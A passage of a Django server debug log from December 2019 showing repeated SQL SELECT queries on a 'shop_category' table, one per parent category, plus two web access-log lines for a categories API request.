"shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:57:19,127 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:57:19,131 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:57:19,135 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:57:19,139 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:57:19,143 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:57:19,148 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:57:19,152 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:57:19,156 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:57:19,160 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:57:19,164 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:57:19,169 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:57:19,173 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:57:19,177 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:57:19,181 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:57:19,185 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:57:19,191 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:57:19,195 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:57:19,199 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:57:19,202 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:57:19,206 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:57:19,210 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:57:19,216 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:57:19,220 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:57:19,224 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:57:19,228 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:57:19,231 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:57:19,237 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:57:19,241 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:57:19,245 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:57:19,249 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:57:19,253 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:57:19,259 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:57:19,263 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:57:19,267 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:57:19,271 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:57:19,275 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:57:19,279 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:57:19,283 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:57:19,287 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:57:19,291 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:57:19,296 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:57:19,300 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:57:19] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:00:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:02:13,449 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:02:13,459 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:02:13,464 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:02:13,468 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:02:13,474 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:02:13,477 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:02:13,480 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:02:13,483 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:02:13,486 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:02:13,490 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:02:13,492 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:02:13,495 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:02:13,498 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:02:13,501 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:02:13,505 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:02:13,509 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:02:13,513 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:02:13,517 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:02:13,521 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:02:13,527 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:02:13,531 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:02:13,536 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:02:13,543 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:02:13,549 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:02:13,555 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 